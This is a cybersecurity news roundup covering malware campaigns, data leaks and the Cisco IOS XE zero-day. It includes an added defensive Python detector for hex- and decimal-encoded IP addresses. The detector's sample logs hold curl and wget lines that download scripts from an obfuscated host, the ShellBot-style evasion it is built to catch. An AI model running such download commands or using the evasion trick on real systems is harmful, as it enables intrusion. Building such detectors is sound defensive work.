SAN MATEO, CA, October 23, 2023 — Cybersecurity news weekly roundup. Stories, news, politics, and events that impacted the network security industry last week. Brought to you by NetworkTigers.
- DarkGate malware being spread via fake Corsair job offers on LinkedIn
- Lazarus hackers target defense experts with fraudulent job interviews
- Millions of 23andMe user records leaked onto cybercrime forum
- Thousands of Cisco IOS XE systems compromised by just-announced zero-day flaw
- FBI warns that plastic surgery patients are being targeted by hackers
- Tens of thousands of admin accounts found to be using default passwords
- Healthcare sector warned of new NoEscape ransomware group
- Discord, already popular with hackers, being abused more frequently by APTs
- Cisco IOS XE zero-day flaw under active exploitation in the wild
- New evasion tactic spotted as ShellBot cracks Linux SSH servers
- SpyNote Android trojan records audio and phone calls
- Safeguarding financial sector from ransomware and cyberattacks
DarkGate malware being spread via fake Corsair job offers on LinkedIn
A Vietnamese threat actor group responsible for the Ducktail credential-stealing campaign has been observed using fake LinkedIn posts advertising Facebook Ads specialist positions at Corsair. The posts lure victims into downloading info-stealing malware such as DarkGate and RedLine. The campaign is mostly targeting users in the US, the UK, and India who occupy social media management roles. Victims download a malicious file that launches a script, which de-obfuscates itself and then “constructs DarkGate using strings present in the script.” Read more.
Lazarus hackers target defense experts with fraudulent job interviews
The North Korean hacker collective, Lazarus Group, has been using trojanized Virtual Network Computing (VNC) apps as bait to lure defense industry and nuclear engineers into fake job interviews. Job seekers are tricked into clicking links that lead to malicious apps that “retrieve additional payloads, including a known Lazarus Group malware dubbed LPEClient, which comes fitted with capabilities to profile compromised hosts.” North Korea’s state-sponsored group continues to evolve to maintain its effectiveness, with Mandiant saying that their “threat activity continues to adapt and change to build tailored malware for different platforms, including Linux and macOS.” Read more.
Millions of 23andMe user records leaked onto cybercrime forum
A hacker that released data stolen from genetic testing company 23andMe two weeks ago has followed up with a massive leak that contains data associated with four million users of the platform. The hacker, going by the name of Golem, claims that the information contains data from “the wealthiest people living in the U.S. and Western Europe.” It’s not currently known how the hacker gathered the data, but 23andMe has thus far stated that weak password hygiene of its users as well as a feature called “DNA Relatives” that lets users see the data of others are both contributing factors. 23andMe is reportedly assessing the breach but it has not disclosed the full extent of the damage done. Read more.
Thousands of Cisco IOS XE systems compromised by just-announced zero-day flaw
A just-disclosed maximum severity bug (CVE-2023-20198) within Cisco’s IOS XE systems is already under active exploitation with at least 10,000 instances falling victim to what experts believe is a single opportunistic threat actor who is “casting a wide net.” The instances of attack are not centralized, with victimized systems appearing globally across a number of countries. Cisco has not yet released a patch for the threat, but is recommending that organizations with affected systems disable the HTTPS Server feature on internet-facing IOS XE devices. They also assure users that they are “working non-stop” to develop and provide a fix. Read more.
FBI warns that plastic surgery patients are being targeted by hackers
According to a warning from the FBI, plastic surgery centers are being targeted by hackers who steal personal health data from them to extort doctors and patients. The FBI’s statement says that once information is taken, “attackers demand a ransom from plastic surgeons and patients to prevent sharing this data, which often includes sensitive photographs.” The attacks are launched via phishing messages sent to doctors’ offices that include a malicious link that, when clicked, deploys malware. After the malware harvests data, attackers then turn to social media and social engineering tactics to “enhance” the information. The cybercriminals then attempt to extort doctors and patients through social media messaging, by sending photos to family and colleagues, and even by creating public-facing websites that contain the sensitive info. Read more.
Tens of thousands of admin accounts found to be using default passwords
Threat Compass has reported that, after analyzing a pool of over 1.8 million administrator credentials, more than 40,000 accounts used “admin” as their password, revealing that the use of default passwords is prevalent even among IT professionals. Other weak credentials noted by Threat Compass include “1234,” “demo,” “root,” and a number of other easily guessed passwords that security experts recommend changing immediately. Admin portals are especially attractive targets for hackers, as they can “provide access related to configuration, accounts, and security settings” as well as allow for tracking customers and orders. Read more.
Healthcare sector warned of new NoEscape ransomware group
Healthcare organizations are being warned of a new ransomware-as-a-service provider called NoEscape that is actively targeting professional services, manufacturing, and information industries. However, the group has also been observed indiscriminately setting its sights on the healthcare and public health sector. Believed to be a rebrand of Russian threat actor Avaddon, NoEscape has “unique features and aggressive multi-extortion tactics,” according to the US Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center. NoEscape demands that its ransoms be paid in cryptocurrency. Read more.
Discord, already popular with hackers, being abused more frequently by APTs
Discord, already a hotbed of malicious activity, is now also being utilized by APT groups to target critical infrastructure. According to research from Trellix, sophisticated hacking groups are turning to Discord to help obfuscate their activities by blending them in with the myriad of other, less complex threat actor activity on the platform. For its part, Discord has been largely unable to lessen or curtail the use of its platform in nefarious activities, as the features threat actors abuse have legitimate purposes for other users. “APTs are known for their sophisticated and targeted attacks, and by infiltrating widely used communication platforms like Discord, they can efficiently establish long-term footholds within networks, putting critical infrastructure and sensitive data at risk,” reads Trellix’s report. Read more.
Cisco IOS XE zero-day flaw under active exploitation in the wild
A zero-day flaw within Cisco’s IOS XE software is under attack from hackers, the company warns. The vulnerability (CVE-2023-20198), which is yet to be patched, is “rooted in the web UI feature” and has received the maximum severity rating of 10 via the CVSS scoring system. In an advisory, Cisco said that the flaw “allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.” The vulnerability can only be exploited on enterprise networking gear exposed to the internet or untrusted networks with the Web UI feature enabled. Read more.
New evasion tactic spotted as ShellBot cracks Linux SSH servers
Linux SSH servers are being attacked by cybercriminals using ShellBot, a common malware that “uses dictionary attacks to compromise servers that have weak SSH credentials” and enlists targeted systems for DDoS attacks. The criminals have been observed using hexadecimal IP (Hex IP) addresses to evade detection, a new tactic that has caught the attention of cybersecurity researchers. According to the ASEC advisory on Hex IP attacks, “IP addresses can be expressed in formats other than the dot-decimal notation, including decimal and hexadecimal notations, and are generally compatible with widely used Web browsers.” ShellBot can therefore be “downloaded successfully on a Linux system environment and executed through Perl.” Thankfully, this campaign can be thwarted by maintaining good password hygiene. Read more.
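The Hex IP trick works because URL parsers accept the same loose IPv4 spellings as the classic inet_aton: a single hex or decimal number, octal parts with a leading zero, or fewer than four parts. A defender hunting for such download URLs in shell history or proxy logs needs to normalize every spelling back to dotted-quad before matching indicators. The following is an added example, not code from the original article or from ASEC; the function names and the sample log lines are constructed for illustration.

```python
import re
from ipaddress import IPv4Address

# One inet_aton-style component: 0x.. hex, leading-zero octal, or plain decimal.
_PART = re.compile(r"0[xX][0-9a-fA-F]*|0[0-7]*|[1-9][0-9]*")


def _parse_part(part: str) -> int:
    """Parse one component the way inet_aton and browsers do."""
    if not _PART.fullmatch(part):
        raise ValueError(part)          # e.g. "08" or "example" is not a valid part
    if part[:2].lower() == "0x":
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def normalize_ipv4(host: str):
    """Return the dotted-quad form of any loose IPv4 spelling, or None if host is not one."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        *head, last = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    # Every leading part is one octet; the last part fills all remaining bytes.
    if any(v > 0xFF for v in head) or last >= 1 << (8 * (4 - len(head))):
        return None
    packed = last
    for shift, v in enumerate(reversed(head)):
        packed |= v << (8 * (4 - len(head) + shift))
    return str(IPv4Address(packed))


_HOST_RE = re.compile(r"(?:https?|ftp)://([^/\s:]+)")

# Constructed sample log lines, modelled on a shell-history / proxy log.
SAMPLE_LOGS = [
    "2023-10-20T03:11:05Z cmd: curl -s http://0xC0A80005/x.pl -o /tmp/x.pl",
    "2023-10-20T03:11:07Z cmd: wget http://3232235525/ -O /tmp/x",
    "2023-10-20T03:12:00Z cmd: curl http://192.168.0.5/update.txt",
    "2023-10-20T03:12:30Z cmd: curl https://example.com/health",
]


def find_obfuscated_hosts(log_lines):
    """Flag URL hosts that are IPv4 literals written in anything but plain dotted decimal."""
    hits = []
    for line in log_lines:
        for host in _HOST_RE.findall(line):
            canonical = normalize_ipv4(host)
            if canonical is not None and canonical != host:
                hits.append((host, canonical))
    return hits
```

Run `find_obfuscated_hosts(SAMPLE_LOGS)` to see the hex and decimal spellings resolved to the same 192.168.0.5 that the plain line already uses, so an indicator list keyed on dotted-quad catches all three.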
SpyNote Android trojan records audio and phone calls
Android users are being urged to beware of a banking trojan called SpyNote that has “diverse information-gathering features” that include the ability to access a victim’s call logs, camera, SMS messages, and external storage. Troublingly, it “seeks accessibility permissions, subsequently leveraging it to grant itself additional permissions to record audio and phone calls, log keystrokes, as well as capture screenshots of the phone.” Spread through SMS phishing campaigns, SpyNote is installed on a victim’s device after they click a malicious link. Uninstallation is also difficult, with users having to perform a complete factory reset to remove the malware. Read more.
Safeguarding financial sector from ransomware and cyberattacks
The US Department of the Treasury and the Cyber Security Council of the United Arab Emirates (UAE) have finalized a bilateral Memorandum of Understanding between the two countries and are announcing a new collaboration to address cybersecurity threats together. The initiative involves increased information sharing relating to cybersecurity threats in the financial sector, shared staff training and study visits, as well as cross-border data security exercises. Read more.